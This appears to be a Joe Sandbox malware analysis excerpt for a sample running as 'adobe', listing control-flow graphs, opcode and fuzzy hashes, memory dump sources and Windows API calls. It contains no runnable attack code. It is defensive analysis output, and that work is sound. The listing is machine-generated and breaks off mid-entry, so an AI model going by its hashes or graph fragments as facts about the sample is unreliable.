                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1342094364
                                    • Opcode ID: d023294d747ec131ea5470d89e211b6292457eb689f43488dd0890ec71945829
                                    • Instruction ID: 16d1a717ec00faf8fa5680b735935517a5e73c53abcf66d439b5a345d8c656f9
                                    • Opcode Fuzzy Hash: d023294d747ec131ea5470d89e211b6292457eb689f43488dd0890ec71945829
                                    • Instruction Fuzzy Hash: 05D26B34E102058FCB64DFA8C584A9DB7F2FF89310F668569D509AB365DB34ED85CB80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1342094364
                                    • Opcode ID: ff5f99f9fefb1a99c659dd9b6233e1e8b04e1aa4615b024523d3f1f47464f71c
                                    • Instruction ID: b8ffff3ea1dc1545042d3257d5a3d997f53d04a502775ec68448e3a8db21b062
                                    • Opcode Fuzzy Hash: ff5f99f9fefb1a99c659dd9b6233e1e8b04e1aa4615b024523d3f1f47464f71c
                                    • Instruction Fuzzy Hash: 25529130E202098FDF64DB68D5907AEB7F6FB89310F25882AD505DB395DA35DC81CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1778 6df7cf8-6df7d16 1779 6df7d18-6df7d1b 1778->1779 1780 6df7d3e-6df7d41 1779->1780 1781 6df7d1d-6df7d39 1779->1781 1782 6df7d4e-6df7d51 1780->1782 1783 6df7d43-6df7d4d 1780->1783 1781->1780 1785 6df7d68-6df7d6b 1782->1785 1786 6df7d53-6df7d61 1782->1786 1787 6df7d6d-6df7d87 1785->1787 1788 6df7d8c-6df7d8e 1785->1788 1793 6df7d9e-6df7db4 1786->1793 1794 6df7d63 1786->1794 1787->1788 1789 6df7d95-6df7d98 1788->1789 1790 6df7d90 1788->1790 1789->1779 1789->1793 1790->1789 1798 6df7fcf-6df7fd9 1793->1798 1799 6df7dba-6df7dc3 1793->1799 1794->1785 1800 6df7fda-6df800f 1799->1800 1801 6df7dc9-6df7de6 1799->1801 1804 6df8011-6df8014 1800->1804 1810 6df7fbc-6df7fc9 1801->1810 1811 6df7dec-6df7e14 1801->1811 1805 6df801a-6df8026 1804->1805 1806 6df80c1-6df80c4 1804->1806 1812 6df8031-6df8033 1805->1812 1808 6df80e7-6df80ea 1806->1808 1809 6df80c6-6df80e2 1806->1809 1813 6df831f-6df8321 1808->1813 1814 6df80f0-6df80ff 1808->1814 1809->1808 1810->1798 1810->1799 1811->1810 1832 6df7e1a-6df7e23 1811->1832 1816 6df804b-6df804f 1812->1816 1817 6df8035-6df803b 1812->1817 1818 6df8328-6df832b 1813->1818 1819 6df8323 1813->1819 1827 6df811e-6df8162 1814->1827 1828 6df8101-6df811c 1814->1828 1825 6df805d 1816->1825 1826 6df8051-6df805b 1816->1826 1822 6df803f-6df8041 1817->1822 1823 6df803d 1817->1823 1818->1804 1824 6df8331-6df833a 1818->1824 1819->1818 1822->1816 1823->1816 1830 6df8062-6df8064 1825->1830 1826->1830 1838 6df8168-6df8179 1827->1838 1839 6df82f3-6df8309 1827->1839 1828->1827 1833 6df807b-6df80b4 1830->1833 1834 6df8066-6df8069 1830->1834 1832->1800 1836 6df7e29-6df7e45 1832->1836 1833->1814 1858 6df80b6-6df80c0 1833->1858 1834->1824 1845 6df7e4b-6df7e75 1836->1845 1846 6df7faa-6df7fb6 1836->1846 1849 6df817f-6df819c 1838->1849 1850 6df82de-6df82ed 1838->1850 1839->1813 1861 6df7e7b-6df7ea3 1845->1861 1862 6df7fa0-6df7fa5 1845->1862 1846->1810 1846->1832 1849->1850 1859 6df81a2-6df8298 call 6df6510 1849->1859 1850->1838 1850->1839 1911 6df829a-6df82a4 1859->1911 1912 6df82a6 1859->1912 1861->1862 1868 6df7ea9-6df7ed7 1861->1868 1862->1846 1868->1862 1874 6df7edd-6df7ee6 1868->1874 1874->1862 1875 6df7eec-6df7f1e 1874->1875 1883 6df7f29-6df7f45 1875->1883 1884 6df7f20-6df7f24 1875->1884 1883->1846 1886 6df7f47-6df7f9e call 6df6510 1883->1886 1884->1862 1885 6df7f26 1884->1885 1885->1883 1886->1846 1913 6df82ab-6df82ad 1911->1913 1912->1913 1913->1850 1914 6df82af-6df82b4 1913->1914 1915 6df82b6-6df82c0 1914->1915 1916 6df82c2 1914->1916 1917 6df82c7-6df82c9 1915->1917 1916->1917 1917->1850 1918 6df82cb-6df82d7 1917->1918 1918->1850
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq
                                    • API String ID: 0-3550614674
                                    • Opcode ID: 5e50384821d86043b6fd12bdb6dd5df40193569a0647300be8b9b04f2b194246
                                    • Instruction ID: 71b7c4f02b48b42c930fc300e3acbe22e4c1f00d65c8b36b092cc880471500d6
                                    • Opcode Fuzzy Hash: 5e50384821d86043b6fd12bdb6dd5df40193569a0647300be8b9b04f2b194246
                                    • Instruction Fuzzy Hash: 0D02CF30B102159FDB64DB69D940AAEB7F6FF88300F158468E506DB399DB35EC86CB90
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 27bb64609295ebde30fd9acbf4932c7b667e2eb60bb1e976bbad4565480086a4
                                    • Instruction ID: 512846f47a8ea83bd4faeab97fe244f3f26c70da8f3522f076bad0575973f4e5
                                    • Opcode Fuzzy Hash: 27bb64609295ebde30fd9acbf4932c7b667e2eb60bb1e976bbad4565480086a4
                                    • Instruction Fuzzy Hash: 8A62DE30B102549FDB54DB68D584BAEB7F2EF88304F258469E606EB794DB35ED81CB80
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f5e96d7a2b6e568be9923c13b1ae7192eb78fee3a9c5ed078e0cb25427513a21
                                    • Instruction ID: cf3a0ec3d258de746cafbbedebff265ec31e60b5303de535b25bf1a02d587ed7
                                    • Opcode Fuzzy Hash: f5e96d7a2b6e568be9923c13b1ae7192eb78fee3a9c5ed078e0cb25427513a21
                                    • Instruction Fuzzy Hash: 0F32A034B202098FDB54DB68D990BAEB7B6FB88310F118529E505EB395DB35EC91CB90
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0e57c2af8fd66d46b27726f406d87e7bd65aa07116254850c83dc4427a5d7a7d
                                    • Instruction ID: f6ce7e44c8e66063bd55c5668462f2540e0936d54c2f80f5bc100866fb8485f1
                                    • Opcode Fuzzy Hash: 0e57c2af8fd66d46b27726f406d87e7bd65aa07116254850c83dc4427a5d7a7d
                                    • Instruction Fuzzy Hash: 9D120431F202149FDF24DB64E9807AEB7B6EF95310F158469DA56DB384DA34EC41CB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 6dfac40-6dfac5e 1 6dfac60-6dfac63 0->1 2 6dfac65-6dfac6e 1->2 3 6dfac73-6dfac76 1->3 2->3 4 6dfac99-6dfac9c 3->4 5 6dfac78-6dfac94 3->5 6 6dfac9e-6dfacb1 4->6 7 6dfacb6-6dfacb9 4->7 5->4 6->7 9 6dfaccd-6dfacd0 7->9 10 6dfacbb-6dfacc8 7->10 12 6dfacda-6dfacdd 9->12 13 6dfacd2-6dfacd7 9->13 10->9 16 6dfacdf-6dface8 12->16 17 6dfacf7-6dfacfa 12->17 13->12 18 6dfacee-6dfacf2 16->18 19 6dfae77-6dfaeae 16->19 20 6dfae5d-6dfae66 17->20 21 6dfad00-6dfad03 17->21 18->17 29 6dfaeb0-6dfaeb3 19->29 20->16 24 6dfae6c-6dfae76 20->24 22 6dfad05-6dfad09 21->22 23 6dfad14-6dfad16 21->23 22->24 26 6dfad0f 22->26 27 6dfad1d-6dfad20 23->27 28 6dfad18 23->28 26->23 27->1 30 6dfad26-6dfad4a 27->30 28->27 31 6dfaeb5-6dfaeb9 29->31 32 6dfaec0-6dfaec3 29->32 48 6dfae5a 30->48 49 6dfad50-6dfad5f 30->49 33 6dfaeef-6dfaf2a 31->33 34 6dfaebb 31->34 35 6dfaee6-6dfaee9 32->35 36 6dfaec5-6dfaee1 32->36 44 6dfb11d-6dfb130 33->44 45 6dfaf30-6dfaf3c 33->45 34->32 35->33 38 6dfb152-6dfb155 35->38 36->35 39 6dfb157-6dfb161 38->39 40 6dfb162-6dfb165 38->40 46 6dfb167 40->46 47 6dfb174-6dfb176 40->47 50 6dfb132 44->50 60 6dfaf3e-6dfaf57 45->60 61 6dfaf5c-6dfafa0 45->61 123 6dfb167 call 6dfb198 46->123 124 6dfb167 call 6dfb1a8 46->124 52 6dfb17d-6dfb180 47->52 53 6dfb178 47->53 48->20 58 6dfad77-6dfadb2 call 6df6510 49->58 59 6dfad61-6dfad67 49->59 50->38 52->29 56 6dfb186-6dfb190 52->56 53->52 55 6dfb16d-6dfb16f 55->47 75 6dfadca-6dfade1 58->75 76 6dfadb4-6dfadba 58->76 62 6dfad6b-6dfad6d 59->62 63 6dfad69 59->63 60->50 77 6dfafbc-6dfaffb 61->77 78 6dfafa2-6dfafb4 61->78 62->58 63->58 89 6dfadf9-6dfae0a 75->89 90 6dfade3-6dfade9 75->90 79 6dfadbe-6dfadc0 76->79 80 6dfadbc 76->80 84 6dfb0e2-6dfb0f7 77->84 85 6dfb001-6dfb0dc call 6df6510 77->85 78->77 79->75 80->75 84->44 85->84 97 6dfae0c-6dfae12 89->97 98 6dfae22-6dfae53 89->98 92 6dfaded-6dfadef 90->92 93 6dfadeb 90->93 92->89 93->89 99 6dfae16-6dfae18 97->99 100 6dfae14 97->100 98->48 99->98 100->98 123->55 124->55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1078448309
                                    • Opcode ID: c069f4e3916e1311c1370e7b43459011b569a2d5e75658a5e698a6fa3d44b1cc
                                    • Instruction ID: 2a5d9f1b2b5d3f338cd142be20aa281bcb467f8c2d7429bdcc7f87fb6fe1dec0
                                    • Opcode Fuzzy Hash: c069f4e3916e1311c1370e7b43459011b569a2d5e75658a5e698a6fa3d44b1cc
                                    • Instruction Fuzzy Hash: 78E17D34F2020ACFDB65DB69D9806AEB7B6EF84300F258529D509DB354DB34EC85CB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 863 6df90c8-6df90ed 864 6df90ef-6df90f2 863->864 865 6df90f8-6df910d 864->865 866 6df99b0-6df99b3 864->866 872 6df910f-6df9115 865->872 873 6df9125-6df913b 865->873 867 6df99d9-6df99db 866->867 868 6df99b5-6df99d4 866->868 870 6df99dd 867->870 871 6df99e2-6df99e5 867->871 868->867 870->871 871->864 875 6df99eb-6df99f5 871->875 876 6df9119-6df911b 872->876 877 6df9117 872->877 880 6df9146-6df9148 873->880 876->873 877->873 881 6df914a-6df9150 880->881 882 6df9160-6df91d1 880->882 883 6df9154-6df9156 881->883 884 6df9152 881->884 893 6df91fd-6df9219 882->893 894 6df91d3-6df91f6 882->894 883->882 884->882 899 6df921b-6df923e 893->899 900 6df9245-6df9260 893->900 894->893 899->900 905 6df928b-6df92a6 900->905 906 6df9262-6df9284 900->906 911 6df92cb-6df92d9 905->911 912 6df92a8-6df92c4 905->912 906->905 913 6df92db-6df92e4 911->913 914 6df92e9-6df9363 911->914 912->911 913->875 920 6df9365-6df9383 914->920 921 6df93b0-6df93c5 914->921 925 6df939f-6df93ae 920->925 926 6df9385-6df9394 920->926 921->866 925->920 925->921 926->925
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq
                                    • API String ID: 0-2881790790
                                    • Opcode ID: 9cce9ed9dff5a60cadd26fd157670ae035c0eb9c4d8a21a57a13fdd698501b6e
                                    • Instruction ID: c34498cc3d45667dc4b3c41b0b0b5cefabee8375f98adf2607be409ca583cf1f
                                    • Opcode Fuzzy Hash: 9cce9ed9dff5a60cadd26fd157670ae035c0eb9c4d8a21a57a13fdd698501b6e
                                    • Instruction Fuzzy Hash: 7F914F74F1021A8FDB64DF65D9607AE73FAEF88240F108569C50A9B398EE35EC418B90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 929 6dfcec8-6dfcee3 930 6dfcee5-6dfcee8 929->930 931 6dfceea-6dfceef 930->931 932 6dfcef2-6dfcef5 930->932 931->932 933 6dfcf3e-6dfcf41 932->933 934 6dfcef7-6dfcf39 932->934 935 6dfcf8a-6dfcf8d 933->935 936 6dfcf43-6dfcf85 933->936 934->933 938 6dfcf8f-6dfcfd1 935->938 939 6dfcfd6-6dfcfd9 935->939 936->935 938->939 940 6dfcfdb-6dfcfdd 939->940 941 6dfcfe8-6dfcfeb 939->941 944 6dfd26f-6dfd278 940->944 945 6dfcfe3 940->945 946 6dfcfed-6dfd02f 941->946 947 6dfd034-6dfd037 941->947 951 6dfd27a-6dfd27f 944->951 952 6dfd287-6dfd293 944->952 945->941 946->947 949 6dfd039-6dfd07b 947->949 950 6dfd080-6dfd083 947->950 949->950 959 6dfd0cc-6dfd0cf 950->959 960 6dfd085-6dfd0c7 950->960 951->952 955 6dfd299-6dfd2ad 952->955 956 6dfd3a4-6dfd3a9 952->956 979 6dfd2b3-6dfd2c5 955->979 980 6dfd3b1 955->980 956->980 963 6dfd118-6dfd11b 959->963 964 6dfd0d1-6dfd113 959->964 960->959 966 6dfd3b4-6dfd3c0 963->966 967 6dfd121-6dfd124 963->967 964->963 977 6dfd14c-6dfd15b 966->977 978 6dfd3c6-6dfd6b3 966->978 975 6dfd147-6dfd14a 967->975 976 6dfd126-6dfd142 967->976 975->977 985 6dfd193-6dfd196 975->985 976->975 986 6dfd15d-6dfd162 977->986 987 6dfd16a-6dfd176 977->987 1141 6dfd8da-6dfd8e4 978->1141 1142 6dfd6b9-6dfd6bf 978->1142 1004 6dfd2e9-6dfd2eb 979->1004 1005 6dfd2c7-6dfd2cd 979->1005 980->966 991 6dfd198-6dfd19a 985->991 992 6dfd1a5-6dfd1a8 985->992 986->987 989 6dfd17c-6dfd18e 987->989 990 6dfd8e5-6dfd91e 987->990 989->985 1022 6dfd920-6dfd923 990->1022 991->980 1001 6dfd1a0 991->1001 1002 6dfd1aa-6dfd1ec 992->1002 1003 6dfd1f1-6dfd1f4 992->1003 1001->992 1002->1003 1011 6dfd1f6-6dfd20c 1003->1011 1012 6dfd211-6dfd214 1003->1012 1021 6dfd2f5-6dfd301 1004->1021 1008 6dfd2cf 1005->1008 1009 6dfd2d1-6dfd2dd 1005->1009 1019 6dfd2df-6dfd2e7 1008->1019 1009->1019 1011->1012 1023 6dfd25d-6dfd25f 1012->1023 1024 6dfd216-6dfd225 1012->1024 1019->1021 1048 6dfd30f 1021->1048 1049 6dfd303-6dfd30d 1021->1049 1030 6dfd946-6dfd949 1022->1030 1031 6dfd925-6dfd941 1022->1031 1025 6dfd266-6dfd269 1023->1025 1026 6dfd261 1023->1026 1032 6dfd227-6dfd22c 1024->1032 1033 6dfd234-6dfd240 1024->1033 1025->930 1025->944 1026->1025 1041 6dfd97c-6dfd97f 1030->1041 1042 6dfd94b-6dfd977 1030->1042 1031->1030 1032->1033 1033->990 1040 6dfd246-6dfd258 1033->1040 1040->1023 1044 6dfd98e-6dfd990 1041->1044 1045 6dfd981 1041->1045 1042->1041 1051 6dfd997-6dfd99a 1044->1051 1052 6dfd992 1044->1052 1188 6dfd981 call 6dfda3d 1045->1188 1189 6dfd981 call 6dfda50 1045->1189 1054 6dfd314-6dfd316 1048->1054 1049->1054 1051->1022 1058 6dfd99c-6dfd9ab 1051->1058 1052->1051 1054->980 1059 6dfd31c-6dfd338 call 6df6510 1054->1059 1057 6dfd987-6dfd989 1057->1044 1066 6dfd9ad-6dfda10 call 6df6510 1058->1066 1067 6dfda12-6dfda27 1058->1067 1072 6dfd33a-6dfd33f 1059->1072 1073 6dfd347-6dfd353 1059->1073 1066->1067 1072->1073 1073->956 1075 6dfd355-6dfd3a2 1073->1075 1075->980 1143 6dfd6ce-6dfd6d7 1142->1143 1144 6dfd6c1-6dfd6c6 1142->1144 1143->990 1145 6dfd6dd-6dfd6f0 1143->1145 1144->1143 1147 6dfd8ca-6dfd8d4 1145->1147 1148 6dfd6f6-6dfd6fc 1145->1148 1147->1141 1147->1142 1149 6dfd6fe-6dfd703 1148->1149 1150 6dfd70b-6dfd714 1148->1150 1149->1150 1150->990 1151 6dfd71a-6dfd73b 1150->1151 1154 6dfd73d-6dfd742 1151->1154 1155 6dfd74a-6dfd753 1151->1155 1154->1155 1155->990 1156 6dfd759-6dfd776 1155->1156 1156->1147 1159 6dfd77c-6dfd782 1156->1159 1159->990 1160 6dfd788-6dfd7a1 1159->1160 1162 6dfd8bd-6dfd8c4 1160->1162 1163 6dfd7a7-6dfd7ce 1160->1163 1162->1147 1162->1159 1163->990 1166 6dfd7d4-6dfd7de 1163->1166 1166->990 1167 6dfd7e4-6dfd7fb 1166->1167 1169 6dfd7fd-6dfd808 1167->1169 1170 6dfd80a-6dfd825 1167->1170 1169->1170 1170->1162 1175 6dfd82b-6dfd844 call 6df6510 1170->1175 1179 6dfd846-6dfd84b 1175->1179 1180 6dfd853-6dfd85c 1175->1180 1179->1180 1180->990 1181 6dfd862-6dfd8b6 1180->1181 1181->1162 1188->1057 1189->1057
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq
                                    • API String ID: 0-2086306503
                                    • Opcode ID: e5f6c7a33b5202791a633e02e7c481c26094b280f300a777f7147f18782e047c
                                    • Instruction ID: dbccfc7e254e9a086f49d4f89450003e410fc973b3d8e7b8c335e8e0483af9fa
                                    • Opcode Fuzzy Hash: e5f6c7a33b5202791a633e02e7c481c26094b280f300a777f7147f18782e047c
                                    • Instruction Fuzzy Hash: 7E625E30B102068FCB55DF69E694A5EB7F2FF84304B218A69D0059F369DB75ED86CB80

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1190 6df4b18-6df4b3c 1192 6df4b3e-6df4b41 1190->1192 1193 6df4b47-6df4c3f 1192->1193 1194 6df5220-6df5223 1192->1194 1214 6df4c45-6df4c8d 1193->1214 1215 6df4cc2-6df4cc9 1193->1215 1195 6df5225-6df523f 1194->1195 1196 6df5244-6df5246 1194->1196 1195->1196 1198 6df524d-6df5250 1196->1198 1199 6df5248 1196->1199 1198->1192 1201 6df5256-6df5263 1198->1201 1199->1198 1236 6df4c92 call 6df53d0 1214->1236 1237 6df4c92 call 6df53c0 1214->1237 1216 6df4ccf-6df4d3f 1215->1216 1217 6df4d4d-6df4d56 1215->1217 1234 6df4d4a 1216->1234 1235 6df4d41 1216->1235 1217->1201 1228 6df4c98-6df4cb4 1231 6df4cbf 1228->1231 1232 6df4cb6 1228->1232 1231->1215 1232->1231 1234->1217 1235->1234 1236->1228 1237->1228
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: fpq$XPpq$\Opq
                                    • API String ID: 0-2571271785
                                    • Opcode ID: 3cf54a4a217a13ea7e354a4b4b2a36f9105eeb029fccf4169f544ea3b066f4fa
                                    • Instruction ID: 5928a5ea2509ded8e8c4dd1337ecc188f3d5ed938638f5d79e7664fe848b9a2c
                                    • Opcode Fuzzy Hash: 3cf54a4a217a13ea7e354a4b4b2a36f9105eeb029fccf4169f544ea3b066f4fa
                                    • Instruction Fuzzy Hash: E9618070F102199FEB54DBB9D8547AEBAF6FF88300F208429D606AB395DE758C458B90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2020 6df90b9-6df90ed 2021 6df90ef-6df90f2 2020->2021 2022 6df90f8-6df910d 2021->2022 2023 6df99b0-6df99b3 2021->2023 2029 6df910f-6df9115 2022->2029 2030 6df9125-6df913b 2022->2030 2024 6df99d9-6df99db 2023->2024 2025 6df99b5-6df99d4 2023->2025 2027 6df99dd 2024->2027 2028 6df99e2-6df99e5 2024->2028 2025->2024 2027->2028 2028->2021 2032 6df99eb-6df99f5 2028->2032 2033 6df9119-6df911b 2029->2033 2034 6df9117 2029->2034 2037 6df9146-6df9148 2030->2037 2033->2030 2034->2030 2038 6df914a-6df9150 2037->2038 2039 6df9160-6df91d1 2037->2039 2040 6df9154-6df9156 2038->2040 2041 6df9152 2038->2041 2050 6df91fd-6df9219 2039->2050 2051 6df91d3-6df91f6 2039->2051 2040->2039 2041->2039 2056 6df921b-6df923e 2050->2056 2057 6df9245-6df9260 2050->2057 2051->2050 2056->2057 2062 6df928b-6df92a6 2057->2062 2063 6df9262-6df9284 2057->2063 2068 6df92cb-6df92d9 2062->2068 2069 6df92a8-6df92c4 2062->2069 2063->2062 2070 6df92db-6df92e4 2068->2070 2071 6df92e9-6df9363 2068->2071 2069->2068 2070->2032 2077 6df9365-6df9383 2071->2077 2078 6df93b0-6df93c5 2071->2078 2082 6df939f-6df93ae 2077->2082 2083 6df9385-6df9394 2077->2083 2078->2023 2082->2077 2082->2078 2083->2082
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq
                                    • API String ID: 0-3550614674
                                    • Opcode ID: f33b66952c4d5fbdb5dbf9d534e84b39d6734bf8933209d8f43c73daba78127f
                                    • Instruction ID: 6a6676af8573bf6c19cf9ddf8adc81086cfdd2115ed871d52d1c9131585a860c
                                    • Opcode Fuzzy Hash: f33b66952c4d5fbdb5dbf9d534e84b39d6734bf8933209d8f43c73daba78127f
                                    • Instruction Fuzzy Hash: E8512B74F101058FDB54DB75D960BAF73FAEBC8640F508569C90A9B398EE35EC028BA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2124 16ced30-16ced4b 2125 16ced4d-16ced74 2124->2125 2126 16ced75-16ced8b 2124->2126 2146 16ced8d call 16cee18 2126->2146 2147 16ced8d call 16ced30 2126->2147 2129 16ced92-16ced94 2130 16ced9a-16cedf9 2129->2130 2131 16ced96-16ced99 2129->2131 2138 16cedff-16cee8c GlobalMemoryStatusEx 2130->2138 2139 16cedfb-16cedfe 2130->2139 2142 16cee8e-16cee94 2138->2142 2143 16cee95-16ceebd 2138->2143 2142->2143 2146->2129 2147->2129
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4115373441.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_16c0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d752365bfd530e49377c4c51d8095572048b002b9e16ba648eb33a1a38d458bd
                                    • Instruction ID: ba24ea68e620f2067cb31d8151a79601986d1536aaf50da15a57f35282c9eed0
                                    • Opcode Fuzzy Hash: d752365bfd530e49377c4c51d8095572048b002b9e16ba648eb33a1a38d458bd
                                    • Instruction Fuzzy Hash: 21412372E043958FC714DF69D8142AABFF1EF8A310F1585AAD544E7392DB349844CBE1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2148 6de29f3-6de2a5e 2150 6de2a69-6de2a70 2148->2150 2151 6de2a60-6de2a66 2148->2151 2152 6de2a7b-6de2ab3 2150->2152 2153 6de2a72-6de2a78 2150->2153 2151->2150 2154 6de2abb-6de2b1a CreateWindowExW 2152->2154 2153->2152 2155 6de2b1c-6de2b22 2154->2155 2156 6de2b23-6de2b5b 2154->2156 2155->2156 2160 6de2b5d-6de2b60 2156->2160 2161 6de2b68 2156->2161 2160->2161 2162 6de2b69 2161->2162 2162->2162
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06DE2B0A
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: 320ed1824a1f25227efb52eae5f5dab32c3ca8e74078fd3386713cb4b14299ca
                                    • Instruction ID: c429c29acaefe90b0e08f7e3281bb265052d76fae124c28ddf65b308338e9cf5
                                    • Opcode Fuzzy Hash: 320ed1824a1f25227efb52eae5f5dab32c3ca8e74078fd3386713cb4b14299ca
                                    • Instruction Fuzzy Hash: 5051DFB1D00309DFDB14CF9AC884ADEBBB5BF48310F24852AE819AB214D770A985CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2163 6de29f8-6de2a5e 2164 6de2a69-6de2a70 2163->2164 2165 6de2a60-6de2a66 2163->2165 2166 6de2a7b-6de2b1a CreateWindowExW 2164->2166 2167 6de2a72-6de2a78 2164->2167 2165->2164 2169 6de2b1c-6de2b22 2166->2169 2170 6de2b23-6de2b5b 2166->2170 2167->2166 2169->2170 2174 6de2b5d-6de2b60 2170->2174 2175 6de2b68 2170->2175 2174->2175 2176 6de2b69 2175->2176 2176->2176
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06DE2B0A
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: 264b2be8770058cf41befd94f6aaf7279cfcd8fef3bae04a1e1e5fdb8c913699
                                    • Instruction ID: b304efc20ad44ed38d0a05a6c927bdd2d906c27594bce65ae18df42dae08f2e6
                                    • Opcode Fuzzy Hash: 264b2be8770058cf41befd94f6aaf7279cfcd8fef3bae04a1e1e5fdb8c913699
                                    • Instruction Fuzzy Hash: 2341CDB1D00309DFDB14DF9AC984ADEBBB5FF48310F24852AE819AB214D774A985CF94

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2177 6de6464-6de77c4 2180 6de77ca-6de77cf 2177->2180 2181 6de7874-6de7894 call 6de0774 2177->2181 2182 6de7822-6de785a CallWindowProcW 2180->2182 2183 6de77d1-6de7808 2180->2183 2189 6de7897-6de78a4 2181->2189 2185 6de785c-6de7862 2182->2185 2186 6de7863-6de7872 2182->2186 2190 6de780a-6de7810 2183->2190 2191 6de7811-6de7820 2183->2191 2185->2186 2186->2189 2190->2191 2191->2189
                                    APIs
                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 06DE7849
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd
                                    Similarity
                                    • API ID: CallProcWindow
                                    • String ID:
                                    • API String ID: 2714655100-0
                                    • Opcode ID: a0273409d9eb205401eb4e4bebff4b84ed1591ad735f64cf3edf2ad57452dabb
